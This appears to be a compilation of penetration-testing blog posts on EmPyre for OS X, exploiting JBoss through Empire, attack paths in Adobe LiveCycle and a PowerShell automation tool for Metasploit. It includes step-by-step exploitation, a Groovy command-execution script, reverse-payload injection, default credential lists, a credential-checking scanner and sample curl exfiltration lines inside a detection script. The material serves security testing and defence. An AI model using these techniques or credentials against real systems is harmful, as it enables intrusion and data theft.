Operating with EmPyre

If you’re reading this post, I sincerely hope you’ve already read @harmj0y’s first blog post about EmPyre, located here: http://www.harmj0y.net/blog/empyre/building-an-empyre-with-python/

This post is the second in what will be a series to help users understand and operate with EmPyre. Let’s get started!

Operating in an OS X environment may seem like a daunting task. Many people are under the assumption that merely using a Mac computer makes you or your organization secure. This blog post will cover why that is not necessarily true, how an attacker can effectively operate in an OS X or mixed environment and what defenders can do to avoid having their OS X infrastructure breached.

Every year, CVE Details reports the number of distinct vulnerabilities found in software and operating systems. In 2015, OS X topped the list with 416 reported vulnerabilities.

[Figure: CVE Details 2015 vulnerability statistics]

Compare that to Windows Server 2012’s 155 and the gap is hard to miss. Raw CVE counts are a blunt instrument (they reflect research attention and how vendors split advisories as much as real exposure), but the point stands: operating from an OS X platform certainly does not make you more secure these days. Malware authors have taken notice of the rising market share of OS X, and the volume of OS X malware is climbing with it. In 2016, Carbon Black released a report titled “2015: The Most Prolific Year for OS X Malware”, in which its researchers counted 948 malware samples in 2015 compared to 180 in total for the years 2010 to 2014. Attackers are certainly finding ways to operate on the OS X platform.

[Figure: EmPyre]

As an attacker or security tester, options have been very limited for conducting operations against targets running OS X. The Italian security firm Hacking Team uses a home-grown implant, the Remote Control System (RCS) compromise platform, to operate in OS X environments. For the rest of the world, you either have to create your own Remote Access Trojan (RAT) or find another method for continuous operations. Enter EmPyre, an OS X/Linux offshoot of the PowerShell Empire project.

 

EmPyre was initially developed by @harmj0y in response to a client’s need for testing OS X platforms. The initial post on EmPyre (linked above) contains more details of the RAT’s infrastructure and communications platform. I’m going to cover some of the tradecraft that was built into the RAT to support continuous operations in an OS X environment.

While operating from an OS X environment brings its own challenges, the methodology commonly used for penetration tests or red teams still applies.

[Figure: penetration test methodology]

During a penetration test or red team, initial access can either be manually seeded by the client Point of Contact (POC) or may have to be earned through phishing. If you must phish to gain access, your options are limited compared to those available to testers targeting Windows systems. Currently, EmPyre supports two payloads for a phishing attack: a Microsoft Office macro, or an HTML page that triggers an AppleScript launcher based on CVE-2015-7007.

OS X provides some native situational awareness commands that typically aren’t available on other operating systems. Examples are “pbpaste” for grabbing clipboard contents, “screencapture” for taking screenshots, and “curl”, which is useful for downloading files or exfiltrating data. For the EmPyre RAT, we’ve applied lessons learned during operations to decrease the chances of detection: we took these native methods and reimplemented the same actions as Python modules, which don’t shell out to those well-known binaries and are therefore harder to detect. With EmPyre you’re also able to run port scans, query Active Directory, dump hashes, and perform all the standard post-exploitation functions.

[Screenshot: EmPyre hashdump]

Privilege escalation from EmPyre is currently limited to spawning a new agent via the “sudo” command. Several local privilege escalation exploits for OS X were released in 2016; these have yet to be built into EmPyre and would be a great way for the community to support the project.

OS X offers several mechanisms for persistence: cron jobs for time-based persistence, login hooks for persistence at user login, launch daemons that survive reboots and, much like Windows DLL hijacking, dylib hijacking based on the research of @patrickwardle. All of these methods have been built into EmPyre.

Finally, lateral movement is the last piece of tradecraft to cover. On Windows there are many luxuries such as WMI, pass-the-hash, executing files over UNC paths, WinRM and Remote Desktop Protocol. OS X provides SSH, if it’s enabled, and lessons learned from engagements show that it usually is in corporate environments, since administrators need to administer somehow. EmPyre has modules to either run SSH commands or push a launcher string for a new agent to a remote host over SSH. Pivoting from OS X to Windows is trickier still, as there currently isn’t a solid pass-the-hash implementation for OS X. EmPyre does, however, have a module to exploit JBoss on Windows via Java deserialization, and that module can send the agent callback to a separate Empire server.

In closing, organizations that treat OS X itself as a security boundary are not doing themselves justice without a proper defense-in-depth approach. As the research shows, OS X is prone to vulnerabilities just like any other operating system or software. With the proper tools, such as EmPyre, a security tester can effectively work through a pure OS X or mixed environment. What does this mean for blue teams? Email filters, blocking macros, host-based protection, network heuristics and log aggregation all still play their part in defense in depth. We also know which OS X commands to look for: most of your users aren’t going to be running “pbpaste” from a terminal, and most aren’t going to curl data out of your network either. Monitoring for subtleties like this can be a huge tip-off to malicious activity on the network.
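Here is the detection side of the two paragraphs above (the native situational-awareness commands, and the closing advice to watch for pbpaste and curl), as an added example in Python; it is not part of EmPyre or of the original post. The tab-separated log format (time, host, user, parent process, command line) is constructed to stand in for whatever process-execution telemetry your EDR or audit pipeline produces, and the sample lines are made up.

```python
"""Flag macOS process executions that EmPyre-style tradecraft leans on:
pbpaste and screencapture (native collection), and curl invocations that
push local data to a remote host (exfiltration).

Added example for this post, not EmPyre code. Log format is constructed:
"<ISO timestamp>\\t<host>\\t<user>\\t<parent process>\\t<command line>".
"""
import shlex
from dataclasses import dataclass

# Native macOS commands used to collect clipboard and screen contents.
COLLECTION_CMDS = {"pbpaste", "screencapture"}
# curl options that send local data to the remote side.
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-d", "--data", "--data-binary",
                     "--data-raw", "--data-urlencode", "-F", "--form"}


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    parent: str     # parent process: pbpaste spawned by python is more telling than by bash
    rule: str
    cmdline: str


def _argv(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:              # unbalanced quotes: fall back to a plain split
        return cmdline.split()


def _basename(token):
    return token.rsplit("/", 1)[-1]


def is_curl_upload(argv):
    """True when curl is asked to upload a file or send a request body."""
    if not argv or _basename(argv[0]) != "curl":
        return False
    for i, tok in enumerate(argv[1:], start=1):
        opt = tok.split("=", 1)[0]          # handles --data=... and --upload-file=...
        if opt in CURL_UPLOAD_FLAGS:
            return True
        if opt in ("-X", "--request") and i + 1 < len(argv) \
                and argv[i + 1].upper() in ("POST", "PUT"):
            return True
    return False


def check_line(line):
    """Return a Finding for a suspicious execution, or None."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 5:
        return None
    ts, host, user, parent, cmdline = fields
    argv = _argv(cmdline)
    if not argv:
        return None
    prog = _basename(argv[0])
    if prog in COLLECTION_CMDS:
        return Finding(ts, host, user, parent, f"native_collection:{prog}", cmdline)
    if is_curl_upload(argv):
        return Finding(ts, host, user, parent, "curl_upload", cmdline)
    return None


def scan(lines):
    return [f for f in map(check_line, lines) if f is not None]


# Constructed sample telemetry: two benign lines, four worth a look.
SAMPLE_LOG = [
    "2016-03-01T10:02:11Z\tmbp-01\tjdoe\tbash\tls -la /Users/jdoe",
    "2016-03-01T10:02:40Z\tmbp-01\tjdoe\tpython\tpbpaste",
    "2016-03-01T10:03:05Z\tmbp-02\tasmith\tpython\t/usr/sbin/screencapture -x /tmp/.s.png",
    "2016-03-01T10:03:20Z\tmbp-02\tasmith\tbash\tcurl -s https://www.example.org/",
    "2016-03-01T10:03:31Z\tmbp-02\tasmith\tpython\tcurl -s -T /tmp/.s.png https://198.51.100.7/up",
    "2016-03-01T10:05:00Z\tmbp-01\tjdoe\tbash\tcurl --data-binary @/etc/hosts http://203.0.113.9/",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.user} [{f.rule}] parent={f.parent}: {f.cmdline}")
```

A plain `curl` download is deliberately not flagged; only the upload and request-body options are, which keeps the noise down on hosts where developers fetch things all day. The parent process is carried into the finding because a clipboard grab spawned from a python process is a very different story from one typed into Terminal.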

Stay tuned for more in-depth blogs from other ATD members!

Get started with EmPyre here

 

Exploiting JBoss with Empire and PowerShell

When Empire was initially launched by @harmj0y and @sixdub at BSidesLV, I was immediately excited about the possibilities that a pure PowerShell RAT would bring to the offensive community. With what little free time I have, I’ve been working to add a few modules that have been inspired by recent engagements I’ve been on. This post will cover how to enumerate and exploit an internal web service through a deployed Empire agent without port scanning.

In this demonstration, I have an Empire agent running on a Windows 7 host. The plan is to quietly enumerate the network for vulnerable web services and exploit one to move laterally.

[Screenshot 1]

First, I load the recon/find_fruit module and set the required options. The find_fruit module accepts CIDR ranges as well as single hosts, and it is multi-threaded with a default of ten threads. What makes this module great for red teaming or quieter penetration testing is that, unlike port scanning, it uses legitimate web requests to check for web services that we commonly target, such as Apache Tomcat, JBoss, ColdFusion and more. The module will also accept a custom dictionary if desired. Kicking off the module, I quickly find some “low hanging fruit” on a host in my target range.
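The sweep described above, written out as an added Python example (it is not the find_fruit module’s own PowerShell): expand a CIDR range or single host, request a small dictionary of console paths on each host and port from a pool of ten threads, and keep anything that answers 200, 401 or 403. The path dictionary, the port list and the status set are my assumptions; the `fetch` parameter exists so the sweep can be driven with a stub instead of live requests.

```python
"""Look for commonly targeted web consoles with ordinary HTTP GETs rather
than a port scan, in the spirit of Empire's recon/find_fruit.

Added example for this post, not the module's code. FRUIT, the default
ports and INTERESTING are assumptions about what such a sweep should check.
"""
import ipaddress
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# "Low hanging fruit": admin consoles that turn up on internal networks.
FRUIT = {
    "/manager/html": "Apache Tomcat manager",
    "/jmx-console/": "JBoss JMX console",
    "/web-console/": "JBoss web console",
    "/CFIDE/administrator/": "ColdFusion administrator",
}
# 401/403 still prove the console exists; it is just behind auth.
INTERESTING = {200, 401, 403}


def expand_hosts(spec):
    """Accept '10.0.0.5' or '10.0.0.0/24' and return the host addresses."""
    net = ipaddress.ip_network(spec, strict=False)
    if net.num_addresses <= 2:          # /31 and /32: every address is a host
        return [str(a) for a in net]
    return [str(a) for a in net.hosts()]


def build_urls(spec, ports=(80, 8080), paths=FRUIT):
    """Cartesian product of hosts, ports and paths (plain http only here;
    an SSL port would need an https scheme and usually an unverified context)."""
    return [f"http://{host}:{port}{path}"
            for host in expand_hosts(spec)
            for port in ports
            for path in paths]


def http_status(url, timeout=3):
    """GET url and return the status code, or None when nothing answers."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:     # 401/403/404 arrive here
        return e.code
    except (urllib.error.URLError, OSError):
        return None


def find_fruit(spec, ports=(80, 8080), paths=FRUIT, threads=10, fetch=http_status):
    """Return {url: (status, description)} for consoles that answered."""
    urls = build_urls(spec, ports, paths)
    with ThreadPoolExecutor(max_workers=threads) as pool:
        statuses = list(pool.map(fetch, urls))
    hits = {}
    for url, status in zip(urls, statuses):
        if status in INTERESTING:
            path = "/" + url.split("/", 3)[3]       # strip scheme://host:port
            hits[url] = (status, paths[path])
    return hits


if __name__ == "__main__":
    import sys
    for url, (status, what) in sorted(find_fruit(sys.argv[1]).items()):
        print(f"[{status}] {what}: {url}")
```

Each request is a normal GET with a browser-like User-Agent, so on the wire it looks like a user clicking a bookmark rather than a SYN sweep. Feeding `fetch` a stub is also how you sanity-check the URL generation before pointing it at a real range.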

[Screenshot 2]

Next, I want to create a payload and exploit the JMX console. Thanks to a stager by @ch33kyf3ll0w, Empire can generate Java .war files for deploying agents. If you’re doing this outside of Empire, you can also generate a .war file with another @harmj0y script at https://gist.github.com/HarmJ0y/aecabdc30f4c4ef1fad3

[Screenshot 3]

Here I host the .war file with the Python SimpleHTTPServer module. This is necessary because the jmx-console exploit makes the target server reach out, fetch this file and deploy it.

[Screenshot 4]

Finally, I load the exploitation/exploit_jboss module and set the required options. I start by setting the JMXConsole switch to “true”. Next, the AppName needs to match the AppName I used when generating the .war file. I point WarFile at my Python-hosted file. Since I am tunneling this exploit through an already deployed agent, I set the Agent option to the agent the exploit should run from. Empire will also warn you that this module is not “opsec safe”, meaning it drops a file to disk on the target (the deployed .war).

[Screenshot 5]

Once the exploit is launched, I first see the HTTP request from the target server to grab the hosted .war file. After a few seconds, I am greeted by a new Empire agent!

If you’re looking for a way to enumerate and exploit internal web services without the noise of port scanning, give this a try. The standalone Find-Fruit and Exploit-JBoss PowerShell scripts may be found in my GitHub repository as well.

Scripts: https://github.com/rvrsh3ll/Misc-Powershell-Scripts

Empire http://www.powershellempire.com/

Leveraging Adobe LiveCycle

Adobe LiveCycle is an enterprise document and form platform that is being widely adopted by businesses and government agencies looking to centralize processes and document management. As with many web applications that connect to back-end systems, it adds attack surface that may be leveraged to gain a foothold in the target network. For defenders, this means ensuring LiveCycle administrators exercise good security practices across the whole LiveCycle surface, which can be quite large, as you’ll see in this post. LiveCycle runs on many platforms and installations vary. In this post, I’ll point out the areas of LiveCycle ES4 that may provide fruitful attack vectors to leverage on your next engagement.

LiveCycle sets up several access portals during a default installation that may be reachable with default credentials. My experience has shown that administrators tend to change the main “adminui” portal password and overlook the OSGi administrative console password. Adobe was even kind enough to leave the OSGi console out of the “Next Steps” to perform after installation!

“OSGI provides developers with a way to create applications at a modular level, allowing the development and management of individual components that work together to form that larger puzzle as an adaptive and dynamic system.” – Source http://www.icidigital.com/osgi-with-cq5/

This console provides a very useful scripting console which we can leverage to further attack the system and possibly gain a system shell. Let’s run through an example of this attack path.

OSGi Attack Path:

The OSGi console uses HTTP Basic Authentication and can typically be reached at “http[s]://[hostname]:[port]/lc/system/console”. The default credentials for this portal are admin:admin.

[Screenshot: OSGi console login]

Next, select “Script Console” under the main menu tab as shown.

[Screenshot: OSGi console menu]

Now we are presented with the scripting console where, depending on the target setup, we can run various scripting languages.

Now we use this Groovy script, found at http://groovy.codehaus.org:

// Command to run, as a Groovy triple-quoted string. Replace the placeholder
// with the program and its arguments; on Windows use an absolute path to the
// executable and escape any embedded quotes.
def command = """executable arg1 arg2 arg3"""

// Spawn the process and block until it exits. For commands that print a lot,
// read the streams before waitFor(), or the child can fill its pipe and hang.
def proc = command.execute()
proc.waitFor()

println "return code: ${proc.exitValue()}"
println "stderr: ${proc.err.text}"
println "stdout: ${proc.in.text}"

For example, we’ll call a simple directory listing command. Make sure you escape quotes correctly as shown in the example, and provide an absolute path to the executable for a Windows target; Linux targets will not require absolute paths.

[Screenshot: directory listing from a Windows target]

On Linux you’ll most likely land as an unprivileged user and need to escalate privileges. On Windows we’re lucky: Adobe LiveCycle requires that the administrator disable UAC during install and, as you can see next, the service runs as SYSTEM.

For this example, I decide to use PowerSploit to inject a reverse payload. Don’t forget to escape any additional quotes!

I had trouble with WP posting this as a code block so it’s an image.

[Screenshot: PowerSploit injection command]

[Screenshot: Meterpreter session from the Windows target]

Workspace Attack Path:

On a recent engagement I found the client had a custom application built that was accessible via the workspace path. Using the default credentials atanaka:password, I was able to access the application, which was obviously still being built. The application used a MySQL database and was vulnerable to SQL injection. It may be worth enumerating any custom-built LiveCycle applications you run across. The default credentials I used are listed below, from the sample setup utility.

Default URLs and Logins

To access the Correspondence Management Solution, you can access the solution template by using the following URL and login information:
URL from another computer: http://[host name]:8080/lc/cm/
URL from another computer if SSL was enabled: https://[host name]:8443/lc/cm/

Default user name: administrator
Default password: password

To access Administration Console, use the following URL and login information:

URL from another computer: http://[host name]:8080/adminui
URL from another computer if SSL was enabled: https://[host name]:8443/adminui

Default user name: administrator
Default password: password

To access the CRX Package Manager, use the following URL and login information:

URL from another computer: http://[host name]:8080/lc/crx/packmgr/index.jsp
URL from another computer if SSL was enabled: https://[host name]:8443/lc/crx/packmgr/index.jsp
Default user name: administrator
Default password: password

To access Mobile Forms Installation Verification Sample (IVS) application, use the following information:

URL from another computer: http://[host name]:8080/mobileformsivs
URL from another computer if SSL was enabled: https://[host name]:8443/mobileformsivs

If you have installed and deployed Reader Extensions, access the web application as follows:

URL from another computer: http://[host name]:8080/ReaderExtensions
URL from another computer if SSL was enabled: https://[host name]:8443/ReaderExtensions

Default user name: administrator
Default password: password

If you have installed and deployed Process Management, access the Workspace web application as follows:

Flex Workspace:

URL from another computer: http://[host name]:8080/workspace
URL from another computer if SSL was enabled: https://[host name]:8443/workspace

HTML Workspace:
URL from this computer: http://localhost:8080/lc/content/ws
URL from another computer: http://[host name]:8080/lc/content/ws
URL from another computer if SSL was enabled: https://[host name]:8443/lc/content/ws

Default user name: administrator
Default password: password

Additional default credentials may also be present if the administrator used the Adobe Sample Setup Utility:

User Name | Password | Email | Role(s)
atanaka | password | atanaka@sampleorganization.com | LiveCycle Application Administrator; LiveCycle Workspace User; LiveCycle Contentspace Administrator; LiveCycle Contentspace User
jjacobs | password | jjacobs@sampleorganization.com | LiveCycle Workspace User; LiveCycle Contentspace User
srose | password | srose@sampleorganization.com | LiveCycle Workspace User; LiveCycle Contentspace User
kbowman | password | kbowman@sampleorganization.com | LiveCycle Workspace User; LiveCycle Contentspace User

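The default portals and logins above lend themselves to a quick check on any LiveCycle ES4 host you run across. The following is an added Python example for this post, not Adobe’s or the author’s tooling. Only the OSGi console is actually tested with its default credentials, because the page documents it as HTTP Basic auth with admin:admin; the form-based portals are reported as present or absent only, since their login form fields are not described here. The default ports 8080 and 8443 are taken from the URL list above.

```python
"""Probe a LiveCycle ES4 host for the default portals and logins listed in
this post. Added example, not Adobe's or the author's code.

The OSGi console is tried with Basic auth admin:admin and a second time
without credentials, to tell "default creds accepted" from "no auth at all".
Other portals are only checked for presence (their form fields are not
documented here)."""
import base64
import ssl
import urllib.error
import urllib.request

# (label, path, default user, default password, accepts HTTP Basic auth)
DEFAULT_PORTALS = [
    ("OSGi console", "/lc/system/console", "admin", "admin", True),
    ("Administration Console", "/adminui", "administrator", "password", False),
    ("Correspondence Management", "/lc/cm/", "administrator", "password", False),
    ("CRX Package Manager", "/lc/crx/packmgr/index.jsp", "administrator", "password", False),
    ("Reader Extensions", "/ReaderExtensions", "administrator", "password", False),
    ("Flex Workspace", "/workspace", "administrator", "password", False),
    ("HTML Workspace", "/lc/content/ws", "administrator", "password", False),
]
# Sample Setup Utility accounts (all with password "password") worth trying
# against Workspace and any custom application exposed there.
SAMPLE_ACCOUNTS = ["atanaka", "jjacobs", "srose", "kbowman"]


def base_url(host, ssl_enabled=False):
    """Default LiveCycle ports: 8080 plain, 8443 when SSL is enabled."""
    return f"https://{host}:8443" if ssl_enabled else f"http://{host}:8080"


def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def http_status(url, headers=None, timeout=5):
    """GET url and return the status code, or None if nothing answers.
    The SSL port usually carries a self-signed certificate, so verification
    is disabled for https: this is a probe, not a client."""
    ctx = None
    if url.startswith("https://"):
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status
    except urllib.error.HTTPError as e:     # 401/403/404 arrive here
        return e.code
    except (urllib.error.URLError, OSError):
        return None


def verdict(status, basic_auth):
    if status is None or status == 404:
        return "absent"
    if basic_auth:
        if status == 200:
            return "default credentials accepted"
        if status in (401, 403):
            return "present, default credentials rejected"
    return f"present (HTTP {status})"


def check_host(host, ssl_enabled=False, fetch=http_status):
    """Return {label: (url, verdict)} for every default portal."""
    base = base_url(host, ssl_enabled)
    results = {}
    for label, path, user, password, basic in DEFAULT_PORTALS:
        url = base + path
        if basic:
            status = fetch(url, {"Authorization": basic_auth_header(user, password)})
            # A 200 with credentials means little if a bare request also gets 200.
            if status == 200 and fetch(url, {}) == 200:
                results[label] = (url, "present, no authentication required")
                continue
        else:
            status = fetch(url, {})
        results[label] = (url, verdict(status, basic))
    return results


if __name__ == "__main__":
    import sys
    for label, (url, result) in check_host(sys.argv[1], "--ssl" in sys.argv).items():
        print(f"{label:28} {result:42} {url}")
```

Run it as `python livecycle_defaults.py lc.example --ssl`. The second, unauthenticated request against the OSGi console is the caveat worth keeping: a console that answers 200 to everyone is a bigger finding than one that merely accepts admin:admin, and the two look identical from a single authenticated request.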
Point-Click-Powershell-Pwn

PowerShell tools have become a must-have for security professionals in recent years. A few notable ones are PowerSploit, Veil-PowerView, PowerUp and Nishang, among others. Each has added value to the penetration tester’s arsenal, but they require the tester to go through some manual steps to run them on target systems. One of my goals is to make PowerShell tools more automated and easier to use during penetration tests by leveraging Cortana and Metasploit. As a result, I have created POSH-Commander to start bringing PowerShell tools into the Armitage/Cobalt Strike interface and improve speed and efficiency on engagements. An included Metasploit module, remote_powershell.rb, may also be run independently to execute your remotely hosted PowerShell scripts.

In this scenario we are targeting a Windows 7 client connected to a Windows Server 2008 domain controller running Active Directory. The user is a standard domain user with no Administrative privileges. Once we have popped a Meterpreter shell, right-clicking on the host will present a POSH-Commander menu to select Veil-PowerView, PowerUp or a custom script.

[Screenshot: POSH-Commander right-click menu]

For this demonstration, I am going to select PowerUp to see if we have any available options for privilege escalation.

[Screenshot: PowerUp selected from the menu]

With all modules, you will be presented with a text prompt if you would like to add additional arguments to the command. Please consult the directions in each script for possible arguments to use with each function. Here, I have selected to run the “Invoke-AllChecks” function with no additional arguments.

[Screenshot: Invoke-AllChecks argument prompt]

Once the results return, we see that we have permission to write to the service binary of the VMTools service. With this information, I can use PowerUp’s “Invoke-ServiceUserAdd” function to abuse the service and add a local user to the Administrators group. This function stops the service, modifies it to create a user, starts the modified service so the user gets created, stops it again and restores the original configuration. Pretty sweet, huh?

[Screenshot: Invoke-AllChecks results]

We right-click the host again and select the PowerUp menu. You’ll notice, you’re provided a new tab for these results so that your previous results stay in their own tab. This time I opt to add arguments to the command as I need to specify the service to manipulate and click “OK” to run the module.

[Screenshot: Invoke-ServiceUserAdd with arguments]

Success! The module has returned “True”, telling me the command completed and added the script’s default user “John” to the local Administrators group. Let’s check.

[Screenshot: net user output showing john]

Interacting with a shell prompt, I run “net user” to check the local users on the target. You can see that “john” has been added to the local users.

 

This is just one of many possibilities utilizing Cortana/Metasploit and some very handy Powershell scripts. For more information on the scripts mentioned in this post, please visit the links below.

 

http://blog.harmj0y.net
http://github.com/harmj0y
https://github.com/Veil-Framework/Veil-PowerView